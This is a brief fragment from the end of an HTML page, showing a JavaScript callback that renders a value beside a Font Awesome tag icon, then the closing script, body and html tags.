            return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
          }
        }
      }
    });
  });
</script>

  </body>
</html>

